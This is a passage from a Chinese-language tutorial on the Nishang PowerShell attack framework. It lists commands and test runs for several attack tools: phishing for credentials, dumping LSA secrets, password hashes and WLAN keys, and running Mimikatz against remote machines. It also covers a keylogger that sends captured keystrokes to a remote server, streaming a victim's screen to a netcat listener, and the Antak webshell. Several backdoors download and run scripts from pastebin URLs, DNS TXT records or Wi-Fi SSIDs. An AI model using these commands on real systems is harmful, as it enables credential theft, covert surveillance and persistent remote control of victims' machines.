<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/invoke-credentials.jpg" alt="Invoke-CredentialsPhish">
&#x6267;&#x884C;&#x540E;&#x4F1A;&#x5F39;&#x51FA;&#x8FD9;&#x4E2A;&#x6846;&#x6B3A;&#x9A97;&#x7528;&#x6237;&#x8F93;&#x5165;
&#x76F4;&#x5230;&#x7528;&#x6237;&#x8F93;&#x5165;&#x6B63;&#x786E;&#x540E;&#x8FD9;&#x4E2A;&#x6846;&#x624D;&#x4F1A;&#x6D88;&#x5931;&#xFF0C;&#x7136;&#x540E;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x5F97;&#x5230;&#x660E;&#x6587;&#x7684;&#x7BA1;&#x7406;&#x5458;&#x8D26;&#x53F7;&#x5BC6;&#x7801;&#xFF1A;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/invoke-credentials2.jpg" alt="Invoke-CredentialsPhish"></p>
<h4 id="firebuster-firelistener">FireBuster FireListener</h4>
<p>FireBuster&#x53EF;&#x4EE5;&#x5BF9;&#x5185;&#x7F51;&#x8FDB;&#x884C;&#x626B;&#x63CF;&#xFF0C;&#x5B83;&#x4F1A;&#x628A;&#x5305;&#x53D1;&#x7ED9;FireListener
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; FireBuster <span class="hljs-number">10.10</span>.<span class="hljs-number">10.10</span> <span class="hljs-number">1000</span>-<span class="hljs-number">1020</span>
PS &gt; FireListener -portrange <span class="hljs-number">1000</span>-<span class="hljs-number">1020</span>
</code></pre>
<p>&#x8BE5;&#x811A;&#x672C;&#x4F5C;&#x8005;&#x7684;Github&#x4E0A;&#x9762;&#x8FD8;&#x63D0;&#x4F9B;&#x4E86;&#x4E00;&#x4E2A;Python&#x7248;&#x7684;&#x76D1;&#x542C;&#x7AEF;&#xFF1A;
<a href="https://github.com/roo7break/PowerShell-Scripts/blob/master/FireBuster/" target="_blank">https://github.com/roo7break/PowerShell-Scripts/blob/master/FireBuster/</a>
&#x6D4B;&#x8BD5;
&#x6211;&#x4EEC;&#x9996;&#x5148;&#x5728;&#x6211;&#x4EEC;&#x7684;&#x673A;&#x5668;&#xFF08;Attacker&#xFF09;&#x4E0A;&#x9762;&#x8FD0;&#x884C;FireListener&#xFF1A;</p>
<pre><code class="lang-powershell">FireListener <span class="hljs-number">100</span>-<span class="hljs-number">110</span>
</code></pre>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/FireListener.jpg" alt="FireListener">
Victim&#xFF1A;</p>
<pre><code class="lang-powershell">FireBuster <span class="hljs-number">192.168</span>.<span class="hljs-number">199.1</span> <span class="hljs-number">90</span>-<span class="hljs-number">110</span> -Verbose
</code></pre>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/firebuster.jpg" alt="FireBuster"></p>
<h4 id="get-information">Get-Information</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x53EF;&#x4EE5;&#x83B7;&#x53D6;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x5927;&#x91CF;&#x7684;&#x4FE1;&#x606F;&#xFF08;FTP&#x8BBF;&#x95EE;&#xFF0C;&#x8FDB;&#x7A0B;&#xFF0C;&#x8BA1;&#x7B97;&#x673A;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x65E0;&#x7EBF;&#x7F51;&#x7EDC;&#x548C;&#x8BBE;&#x5907;&#x7684;&#x4FE1;&#x606F;&#xFF0C;Hosts&#x4FE1;&#x606F;&#x7B49;&#x7B49;&#xFF0C;&#x975E;&#x5E38;&#x4E30;&#x5BCC;&#xFF09;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Get-Information
</code></pre>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/get-info.jpg" alt="get-info">
&#x8FD8;&#x53EF;&#x4EE5;&#x7528;&#x6211;&#x4EEC;&#x524D;&#x9762;&#x8BF4;&#x8FC7;&#x7684;Out-File&#x6765;&#x5C06;&#x8FD0;&#x884C;&#x7ED3;&#x679C;&#x4FDD;&#x5B58;&#x5230;&#x6307;&#x5B9A;&#x6587;&#x4EF6;&#x3002;</p>
<h4 id="get-lsasecret">Get-LSASecret</h4>
<p>&#x8BE5;&#x811A;&#x672C;&#x53EF;&#x4EE5;&#x83B7;&#x53D6;LSA&#x4FE1;&#x606F;&#xFF0C;&#x4F46;&#x662F;&#x4F7F;&#x7528;&#x7684;&#x524D;&#x63D0;&#x5F53;&#x7136;&#x662F;&#x4F60;&#x5DF2;&#x7ECF;&#x6210;&#x529F;&#x63D0;&#x5347;&#x4E86;&#x6743;&#x9650;&#x7684;&#x60C5;&#x51B5;&#x4E0B;&#xFF0C;&#x901A;&#x5E38;&#x548C;&#x6211;&#x4EEC;&#x540E;&#x9762;&#x63D0;&#x6743;&#x5F53;&#x4E2D;&#x6D89;&#x53CA;&#x5230;&#x7684;Enable-DuplicateToken&#xFF08;&#x5E2E;&#x52A9;&#x6211;&#x4EEC;&#x83B7;&#x5F97;System&#x6743;&#x9650;&#xFF09;&#x8054;&#x5408;&#x4F7F;&#x7528;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Enable-DuplicateToken
PS &gt; Get-LsaSecret
PS &gt; Get-LsaSecret -RegistryKey KeyName //&#x8FD8;&#x53EF;&#x4EE5;&#x6307;&#x5B9A;&#x952E;&#x540D;
</code></pre>
<h4 id="get-passhashes">Get-PassHashes</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x5728;Administrator&#x7684;&#x6743;&#x9650;&#x4E0B;&#xFF0C;&#x53EF;&#x4EE5;dump&#x51FA;&#x5BC6;&#x7801;&#x54C8;&#x5E0C;&#x503C;&#x3002;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x6765;&#x81EA;&#x4E8E;msf&#x4E2D;powerdump&#xFF0C;&#x4F46;&#x505A;&#x51FA;&#x4E86;&#x4FEE;&#x6539;&#xFF0C;&#x4F7F;&#x5F97;&#x6211;&#x4EEC;&#x4E0D;&#x518D;&#x9700;&#x8981;System&#x6743;&#x9650;&#x5C31;&#x53EF;&#x4EE5;dump&#x4E86;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Get-PassHashes -PSObjectFormat //&#x53EF;&#x4EE5;&#x4F7F;&#x7528;-PSObjectFormat&#x6765;&#x683C;&#x5F0F;&#x5316;&#x8F93;&#x51FA;&#x7ED3;&#x679C;
</code></pre>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/get-passhashes.jpg" alt="Get-PassHashes"></p>
<h4 id="get-wlan-keys">Get-WLAN-Keys</h4>
<p>&#x5728;Administrator&#x7684;&#x6743;&#x9650;&#x4E0B;&#xFF0C;&#x53EF;&#x4EE5;&#x5229;&#x7528;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x6765;dump&#x51FA;WLAN&#x6587;&#x4EF6;&#x7684;&#x5BC6;&#x94A5;&#x4FE1;&#x606F;&#x3002;&#x5B9E;&#x8D28;&#x4E0A;&#xFF0C;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x5C31;&#x662F;&#x5229;&#x7528;&#x4E86;netsh wlan show profile name=&quot;&quot; key=clear&#x6765;&#x83B7;&#x53D6;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Get-WLAN-Keys
</code></pre>
<h4 id="keylogger">Keylogger</h4>
<p>Keylogger&#x53EF;&#x4EE5;&#x4FDD;&#x5B58;&#x4E0B;&#x7528;&#x6237;&#x7684;&#x952E;&#x76D8;&#x8BB0;&#x5F55;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis  //-CheckURL&#x53C2;&#x6570;&#x4F1A;&#x53BB;&#x68C0;&#x67E5;&#x6240;&#x7ED9;&#x51FA;&#x7684;&#x7F51;&#x9875;&#x4E4B;&#x4E2D;&#x662F;&#x5426;&#x5305;&#x542B; -MagicString&#x540E;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5982;&#x679C;&#x5B58;&#x5728;&#x7684;&#x8BDD;&#x5C31;&#x505C;&#x6B62;&#x4F7F;&#x7528;&#x8BB0;&#x5F55;&#x3002;
PS &gt; .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://<span class="hljs-number">192.168</span>.<span class="hljs-number">254.226</span>/<span class="hljs-keyword">data</span>/catch.php //&#x5C06;&#x8BB0;&#x5F55;&#x6307;&#x5B9A;&#x53D1;&#x9001;&#x7ED9;&#x4E00;&#x4E2A;&#x53EF;&#x4EE5;&#x8BB0;&#x5F55;Post&#x8BF7;&#x6C42;&#x7684;Web&#x670D;&#x52A1;&#x5668;
PS &gt; .\Keylogger.ps1 -persist //&#x5B9E;&#x73B0;&#x6301;&#x4E45;&#x5316;&#x8BB0;&#x5F55;&#xFF08;&#x91CD;&#x542F;&#x540E;&#x4F9D;&#x7136;&#x8FDB;&#x884C;&#x8BB0;&#x5F55;&#xFF09;
PS &gt; .\Keylogger.ps1 //&#x76F4;&#x63A5;&#x4EE5;&#x8FD9;&#x79CD;&#x65B9;&#x5F0F;&#x6765;&#x8FD0;&#x884C;&#xFF0C;&#x952E;&#x76D8;&#x8BB0;&#x5F55;&#x4F1A;&#x4FDD;&#x5B58;&#x5728;&#x5F53;&#x524D;&#x7528;&#x6237;&#x7684;Temp&#x76EE;&#x5F55;&#x4E0B;key&#x6587;&#x4EF6;&#x4E2D;
</code></pre>
<p>&#x6D4B;&#x8BD5;
&#x9996;&#x5148;&#x6267;&#x884C; PS &gt; .\Keylogger.ps1 
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/keylogger.jpg" alt="keylogger">
&#x53D1;&#x73B0;&#x5728;&#x5F53;&#x524D;&#x7528;&#x6237;&#x7684;Temp&#x76EE;&#x5F55;&#x4E0B;&#x751F;&#x6210;&#x4E86;Key&#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x8FD9;&#x65F6;&#x6211;&#x4EEC;&#x4F7F;&#x7528;nishang Utility&#x4E2D;&#x7684;Parse_Keys&#x6765;&#x89E3;&#x6790;</p>
<pre><code class="lang-powershell">PS &gt;Parse_Keys .\key.log .\parsed.txt
</code></pre>
<p>&#x7136;&#x540E;parsed.txt&#x91CC;&#x9762;&#x5C31;&#x662F;&#x89E3;&#x6790;&#x540E;&#x7684;&#x6309;&#x952E;&#x8BB0;&#x5F55;&#x4E86;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/parsed.jpg" alt="Parsed"></p>
<h4 id="invoke-mimikatzwdigestdowngrade">Invoke-MimikatzWdigestDowngrade</h4>
<p>Dump出Windows 8.1 和 Server 2012（以及安装了 KB2871997 的系统）上系统用户的明文密码。这些系统默认不再缓存 WDigest 明文凭据，脚本的做法是把 WDigest 缓存"降级"回开启状态，然后锁屏迫使用户重新登录，再用 Mimikatz 读取；因此需要本地管理员权限，并且只有在用户真正重新解锁会话之后凭据才会出现。
执行方式：</p>
<pre><code class="lang-powershell">PS &gt;Invoke-MimikatzWDigestDowngrade
PS &gt; Get-Job | Receive-Job
</code></pre>
<p>&#x6267;&#x884C;&#x4E86;</p>
<pre><code class="lang-powershell">PS &gt;Invoke-MimikatzWDigestDowngrade
</code></pre>
<p>Windows&#x4F1A;&#x9501;&#x5C4F;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/invoke-down.jpg" alt="lock">
&#x4E4B;&#x540E;&#x6267;&#x884C;</p>
<pre><code class="lang-powershell">Get-Job
</code></pre>
<p>&#x53D1;&#x73B0;&#x5C1D;&#x8BD5;&#x591A;&#x6B21;&#x90FD;&#x6D4B;&#x8BD5;&#x5931;&#x8D25;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/get-job.jpg" alt="Get-Job">
&#x89E3;&#x51B3;&#x529E;&#x6CD5;&#x53EF;&#x4EE5;&#x53C2;&#x8003;&#xFF1A;
<a href="http://www.myhack58.com/Article/html/3/62/2016/75903.htm" target="_blank">&#x57DF;&#x6E17;&#x900F;&#x2014;&#x2014;Dump Clear-Text Password after KB2871997 installed</a></p>
<h4 id="get-passhints">Get-PassHints</h4>
<p>这个脚本可以从Windows获得用户的密码提示信息。密码提示是用户自己设置的明文字符串，经常直接泄露密码或大幅缩小猜解范围；读取 SAM hive 需要 Administrator 权限。
执行方式：</p>
<pre><code class="lang-powershell">PS &gt; Get-PassHints
</code></pre>
<h4 id="show-targetscreen">Show-TargetScreen</h4>
<p>使用MJPEG传输目标机器的远程桌面的实时画面，在本机我们可以使用NC或者Powercat来进行监听。在本地使用支持MJPEG的浏览器（如：Firefox）访问本机对应监听端口，即可在浏览器上面看到远端传输回来的实时画面。注意这条 MJPEG 流是未加密的裸 TCP 连接，路径上的任何人都能看到目标桌面内容，而且持续的高流量外连也很容易被网络监控发现。</p>
<pre><code class="lang-powershell">PS &gt; Show-TargetScreen -Reverse -IPAddress <span class="hljs-number">192.168</span>.<span class="hljs-number">230.1</span> -Port <span class="hljs-number">443</span>  //&#x5C06;&#x8FDC;&#x7A0B;&#x7684;&#x753B;&#x9762;&#x4F20;&#x9001;&#x5230;<span class="hljs-number">192.168</span>.<span class="hljs-number">230.1</span>&#x7684;<span class="hljs-number">443</span>&#x7AEF;&#x53E3;
</code></pre>
<p>&#x6D4B;&#x8BD5;
Victim&#xFF1A;</p>
<pre><code class="lang-powershell">Show-TargetScreen -IPAddres <span class="hljs-number">192.168</span>.<span class="hljs-number">199.127</span> -Port <span class="hljs-number">5773</span> -Reverse
</code></pre>
<p>Attacker&#xFF1A;</p>
<pre><code class="lang-powershell">nc.exe -nlvp <span class="hljs-number">5773</span> | nc.exe -nlvp <span class="hljs-number">9000</span> //&#x8FD9;&#x91CC;&#x6211;&#x4F7F;&#x7528;&#x7684;NC&#xFF0C;&#x4E5F;&#x53EF;&#x4EE5;&#x7528;Powercat
</code></pre>
<p>&#x672C;&#x673A;&#x8BBF;&#x95EE;&#xFF1A;127.0.0.1:9000
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/show-targetscreen.jpg" alt="show-targetscreen"></p>
<h4 id="invoke-mimikatz">Invoke-Mimikatz</h4>
<p>Mimikatz&#x5927;&#x5BB6;&#x90FD;&#x975E;&#x5E38;&#x719F;&#x6089;&#x4E86;&#xFF0C;&#x5C31;&#x4E0D;&#x518D;&#x4ECB;&#x7ECD;&#x4E86;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">Invoke-Mimikatz -DumpCerts //Dump出本机证书存储里的证书和私钥（注意这不是凭证；要Dump凭证请用下一行的 -DumpCreds）
Invoke-Mimikatz -DumpCreds -ComputerName @(<span class="hljs-string">&quot;computer1&quot;</span>, <span class="hljs-string">&quot;computer2&quot;</span>) //Dump&#x51FA;&#x8FDC;&#x7A0B;&#x4E24;&#x53F0;&#x8BA1;&#x7B97;&#x673A;&#x7684;&#x51ED;&#x8BC1;&#x4FE1;&#x606F;
Invoke-Mimikatz -Command <span class="hljs-string">&quot;privilege::debug exit&quot;</span> -ComputerName <span class="hljs-string">&quot;computer1&quot;</span> //&#x5728;&#x8FDC;&#x7A0B;&#x4E00;&#x53F0;&#x673A;&#x5668;&#x4E0A;&#x8FD0;&#x884C;Mimikatz&#x5E76;&#x6267;&#x884C;<span class="hljs-string">&quot;privilege::debug exit&quot;</span>
</code></pre>
<h3 id="1&#x57DF;&#x76F8;&#x5173;&#x811A;&#x672C;">1.&#x57DF;&#x76F8;&#x5173;&#x811A;&#x672C;</h3>
<h4 id="get-unconstrained">Get-Unconstrained</h4>
<p>&#x67E5;&#x627E;&#x57DF;&#x5185;&#x5F00;&#x542F;&#x4E86;Kerberos Unconstrained Delegation&#x7684;&#x673A;&#x5668;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Get-Unconstrained //&#x8FD4;&#x56DE;&#x5F00;&#x542F;&#x7684;&#x8BA1;&#x7B97;&#x673A;&#x540D;
PS &gt; Get-Unconstrained -Details  //&#x8FD4;&#x56DE;&#x66F4;&#x8BE6;&#x7EC6;&#x7684;&#x4FE1;&#x606F;
</code></pre>
<p>开启了非约束委派的机器会把向它认证的任何用户（包括域管理员）的 TGT 缓存在本机内存中，拿到这台机器的本地管理员权限后即可导出并冒用这些票据，这也是为什么要优先找出这类主机。关于"通过Kerberos Unconstrained Delegation获取到域管理员"：
<a href="http://www.freebuf.com/articles/terminal/98530.html" target="_blank">http://www.freebuf.com/articles/terminal/98530.html</a></p>
<h3 id="2antak-webshell">2.Antak Webshell</h3>
<h4 id="antak">Antak</h4>
<p>&#x4E00;&#x4E2A;ASPX&#x7684;Webshell&#xFF0C;&#x901A;&#x8FC7;&#x8FD9;&#x4E2A;Webshell&#x53EF;&#x4EE5;&#x7F16;&#x7801;&#x3001;&#x6267;&#x884C;&#x811A;&#x672C;&#xFF0C;&#x4E0A;&#x4F20;&#x3001;&#x4E0B;&#x8F7D;&#x6587;&#x4EF6;&#x3002;
![Antak_UI][7]
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">&#x4E0A;&#x4F20;Webshell&#x540E;&#x628A;&#x5B83;&#x5F53;&#x6210;&#x4E00;&#x4E2A;&#x6B63;&#x5E38;&#x7684;Powershell&#x6267;&#x884C;&#x7A97;&#x53E3;&#x6765;&#x4F7F;&#x7528;
&#x4E0A;&#x4F20;&#x548C;&#x4E0B;&#x8F7D;&#x6587;&#x4EF6;&#xFF0C;&#x53EA;&#x9700;&#x8981;&#x586B;&#x5199;&#x597D;&#x5BF9;&#x5E94;&#x8DEF;&#x5F84;&#x70B9;&#x51FB;&#x4E0A;&#x4F20;&#x3001;&#x4E0B;&#x8F7D;&#x6309;&#x94AE;&#x5373;&#x53EF;
</code></pre>
<p>&#x5173;&#x4E8E;Antak Webshell&#x7684;&#x66F4;&#x591A;&#x4ECB;&#x7ECD;&#xFF0C;&#x8BF7;&#x53C2;&#x8003;&#xFF1A;
<a href="http://www.labofapenetrationtester.com/2014/06/introducing-antak.html" target="_blank">http://www.labofapenetrationtester.com/2014/06/introducing-antak.html</a></p>
<h3 id="3&#x540E;&#x95E8;">3.&#x540E;&#x95E8;</h3>
<h4 id="http-backdoor">HTTP-Backdoor</h4>
<p>HTTP-Backdoor可以帮助我们在目标机器上下载和执行Powershell脚本。
安全提示：例子里 CheckURL 和 PayloadURL 都指向公开 pastebin 的明文 HTTP 地址，下载回来的脚本没有任何完整性校验就直接执行，所以任何能改写这些内容（或在网络上篡改响应）的人都能在目标上执行任意代码；实际使用时应把地址换成自己控制的 HTTPS 服务。
执行方式：</p>
<pre><code class="lang-powershell">PS &gt; HTTP-Backdoor -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -MagicString start123 -StopString stopthis
</code></pre>
<p>&#x4E0B;&#x9762;&#x89E3;&#x91CA;&#x4E0B;&#x51E0;&#x4E2A;&#x6BD4;&#x8F83;&#x91CD;&#x8981;&#x7684;&#x53C2;&#x6570;&#xFF1A;</p>
<ul>
<li>CheckURL &#x7ED9;&#x51FA;&#x4E00;&#x4E2A;URL&#x5730;&#x5740;&#xFF0C;&#x5982;&#x679C;&#x5B58;&#x5728;&#x6211;&#x4EEC;MagicString&#x4E2D;&#x7684;&#x503C;&#x5C31;&#x53BB;&#x6267;&#x884C;Payload - &#x4E0B;&#x8F7D;&#x8FD0;&#x884C;&#x6211;&#x4EEC;&#x7684;&#x811A;&#x672C;</li>
<li>PayloadURL &#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#x7ED9;&#x51FA;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x4E0B;&#x8F7D;&#x7684;Powershell&#x811A;&#x672C;&#x7684;&#x5730;&#x5740;</li>
<li>Arguments &#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#x6307;&#x5B9A;&#x6211;&#x4EEC;&#x8981;&#x6267;&#x884C;&#x7684;&#x51FD;&#x6570;</li>
<li>StopString 这个参数也会去看是否存在我们CheckURL返回的字符串，如果存在就会停止执行</li>
</ul>
<h4 id="dnstxtpwnage">DNS_TXT_Pwnage</h4>
<p>利用DNS隧道来进行信息传输、通信的小技巧已经不少见了。在Nishang中也集成了一个通过DNS TXT来接收命令或者脚本的后门脚本。使用DNS_TXT_Pwnage这个脚本，我们一般需要配合Utility下的Out-DnsTxt使用。
需要注意的是，TXT 记录是公开且明文的：任何人都能查询到其中编码的命令和脚本，而任何能够控制该域名 DNS 应答的人（域名所有者、上游解析器或路径上的攻击者）都可以向这个后门下发命令。
所以这里首先说下Out-DnsTxt的使用：</p>
<pre><code class="lang-powershell">PS &gt;Out-DnsTxt -DataToEncode path //path&#x5904;&#x662F;&#x4F60;&#x60F3;&#x7F16;&#x7801;&#x7684;&#x5185;&#x5BB9;&#x7684;&#x8DEF;&#x5F84;
</code></pre>
<p>&#x4E4B;&#x540E;&#xFF0C;&#x5B83;&#x4F1A;&#x751F;&#x6210;&#x4E00;&#x4E2A;&#x7F16;&#x7801;&#x540E;&#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/out-dns.jpg" alt="out-dnstxt">
&#x7136;&#x540E;&#x6211;&#x4EEC;&#x53BB;&#x6DFB;&#x52A0;&#x5BF9;&#x5E94;&#x7684;TXT&#x8BB0;&#x5F55;&#x5C31;&#x884C;&#x4E86;&#xFF0C;encoded.txt&#x6587;&#x4EF6;&#x4E2D;&#x6BCF;&#x4E00;&#x884C;&#x4E3A;&#x4E00;&#x6761;&#x8BB0;&#x5F55;
&#x6DFB;&#x52A0;&#x5B8C;&#x540E;&#x6211;&#x4EEC;&#x8FD8;&#x9700;&#x8981;&#x6DFB;&#x52A0;&#x4E24;&#x6761;TXT&#x8BB0;&#x5F55;&#xFF0C;&#x5185;&#x5BB9;&#x4E3A;start&#x548C;stop
&#x6DFB;&#x52A0;&#x5B8C;&#x6210;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x5229;&#x7528;DNS_TXT_Pwnage&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x4E86;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt;DNS_TXT_Pwnage -startdomain start.test.com -cmdstring start -commanddomain command.test.com -psstring test -psdomain xxx.test.com -Subdomains <span class="hljs-number">1</span> -StopString stop
</code></pre>
<p>&#x5177;&#x4F53;&#x53C2;&#x6570;&#x7684;&#x610F;&#x601D;&#xFF1A;</p>
<ul>
<li>startdomain &#x4F1A;&#x4E00;&#x76F4;&#x53BB;&#x68C0;&#x6D4B;&#x6211;&#x4EEC;&#x6307;&#x5B9A;&#x57DF;&#x540D;&#x7684;TXT&#x8BB0;&#x5F55;&#xFF0C;&#x5E76;&#x628A;&#x8FD4;&#x56DE;&#x7684;&#x8BB0;&#x5F55;&#x4E0E;&#x6211;&#x4EEC;&#x8F93;&#x5165;&#x7684;cmdstring&#x4EE5;&#x53CA;psstring&#x8FDB;&#x884C;&#x6BD4;&#x8F83;</li>
<li>cmdstring &#x662F;&#x6211;&#x4EEC;&#x4EFB;&#x610F;&#x8F93;&#x5165;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5982;&#x679C;startdomain&#x4E0E;&#x6211;&#x4EEC;&#x8FD9;&#x91CC;&#x8F93;&#x5165;&#x7684;cmdstring&#x503C;&#x76F8;&#x7B49;&#x5219;&#x6267;&#x884C;commanddomain&#x547D;&#x4EE4;</li>
<li>commanddomain &#x521B;&#x5EFA;&#x7684;&#x6267;&#x884C;&#x547D;&#x4EE4;TXT&#x8BB0;&#x5F55;&#x7684;&#x57DF;&#x540D;</li>
<li>psstring &#x662F;&#x6211;&#x4EEC;&#x4EFB;&#x610F;&#x8F93;&#x5165;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5982;&#x679C;&#x4E0E;&#x6211;&#x4EEC;&#x8FD9;&#x91CC;&#x8F93;&#x5165;&#x7684;psstring&#x503C;&#x76F8;&#x7B49;&#x5219;&#x6267;&#x884C;psdomain&#x811A;&#x672C;</li>
<li>psdomain &#x662F;&#x6211;&#x4EEC;&#x521B;&#x5EFA;&#x7684;&#x6267;&#x884C;&#x811A;&#x672C;TXT&#x8BB0;&#x5F55;&#x7684;&#x57DF;&#x540D;</li>
<li>Subdomains &#x662F;&#x6267;&#x884C;&#x811A;&#x672C;&#x521B;&#x5EFA;TXT&#x8BB0;&#x5F55;&#x7684;&#x4E2A;&#x6570;</li>
<li>StopString &#x662F;&#x4EFB;&#x610F;&#x8F93;&#x5165;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5982;&#x679C;&#x8FD9;&#x91CC;&#x8F93;&#x5165;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#x4E0E;startdomain&#x4E2D;&#x8FD4;&#x56DE;&#x7684;&#x8BB0;&#x5F55;&#x76F8;&#x540C;&#x5C06;&#x4F1A;&#x505C;&#x6B62;&#x6267;&#x884C;&#x6211;&#x4EEC;&#x7684;Payload</li>
<li>Arguments 指定要执行的函数名</li>
</ul>
<h4 id="execute-ontime">Execute-OnTime</h4>
<p>Execute-OnTime 可以在指定的时间点下载并执行Powershell脚本（定时触发的后门）。
执行方式：</p>
<pre><code class="lang-powershell">PS &gt; Execute-OnTime -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload
</code></pre>
<p>&#x5177;&#x4F53;&#x53C2;&#x6570;&#x7684;&#x610F;&#x601D;&#xFF1A;</p>
<ul>
<li>PayloadURL &#x6307;&#x5B9A;&#x6211;&#x4EEC;&#x811A;&#x672C;&#x4E0B;&#x8F7D;&#x7684;&#x5730;&#x5740;</li>
<li>Arguments &#x6307;&#x5B9A;&#x6267;&#x884C;&#x7684;&#x51FD;&#x6570;&#x540D;</li>
<li>Time &#x53C2;&#x6570;&#x53EF;&#x4EE5;&#x8BBE;&#x5B9A;&#x811A;&#x672C;&#x6267;&#x884C;&#x7684;&#x65F6;&#x95F4;&#xFF08;&#x4F8B;&#x5982;  -Time 23:21&#xFF09;</li>
<li>CheckURL 参数会检测我们一个指定的URL内容是否存在StopString给出的字符串，如果发现了就停止执行</li>
</ul>
<h4 id="gupt-backdoor">Gupt-Backdoor</h4>
<p>Gupt-Backdoor这个脚本可以帮助我们通过无线SSID反弹后门和执行命令。由于指令是通过附近任何人都能广播的 SSID 名称传入的，这个后门没有任何身份验证：只要知道 MagicString 前缀，任何处于无线范围内的人都能让它执行命令或下载脚本。
执行方式：</p>
<pre><code class="lang-powershell">PS &gt;Gupt-Backdoor -MagicString test -Verbose
</code></pre>
<p>&#x8FD9;&#x91CC;&#x89E3;&#x91CA;&#x4E00;&#x4E0B;MagicString&#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#xFF1A;
MagicString&#x5F00;&#x5934;&#x7684;4&#x4E2A;&#x5B57;&#x7B26;&#x662F;&#x7528;&#x6765;&#x8BC6;&#x522B;&#x6211;&#x4EEC;&#x5EFA;&#x7ACB;&#x7684;WIFI SSID&#x7684;&#x3002;&#x4F8B;&#x5982;&#xFF0C;&#x8FD9;&#x91CC;&#x662F;test&#xFF0C;Gupt&#x540E;&#x95E8;&#x4F1A;&#x53BB;&#x81EA;&#x52A8;&#x5339;&#x914D;&#x6211;&#x4EEC;WIFI&#x4E2D;SSID&#x4EE5;test&#x5F00;&#x5934;&#x7684;&#x3002;&#x800C;MagicString&#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#x4ECE;&#x7B2C;&#x4E94;&#x4E2A;&#x5B57;&#x7B26;&#x5F00;&#x59CB;&#x5C31;&#x51B3;&#x5B9A;&#x4E86;&#x6211;&#x4EEC;&#x662F;&#x6267;&#x884C;&#x547D;&#x4EE4;&#x6216;&#x662F;&#x4E0B;&#x8F7D;&#x811A;&#x672C;&#x3002;
&#x9700;&#x8981;&#x6CE8;&#x610F;&#x7684;&#x662F;&#xFF1A;</p>
<ul>
<li>&#x5982;&#x679C;&#x5B83;&#x7684;&#x7B2C;&#x4E94;&#x4E2A;&#x5B57;&#x7B26;&#x662F;c&#x5C31;&#x4EE3;&#x8868;&#x6267;&#x884C;&#x547D;&#x4EE4;&#x3002;
&#x4F8B;&#x5982;&#xFF1A;-MagicString testcwhoami 
&#x5C31;&#x4F1A;&#x5339;&#x914D;WIFI SSID&#x4E3A;test&#x7684;&#xFF0C;&#x5E76;&#x6267;&#x884C;&#x547D;&#x4EE4;whoami</li>
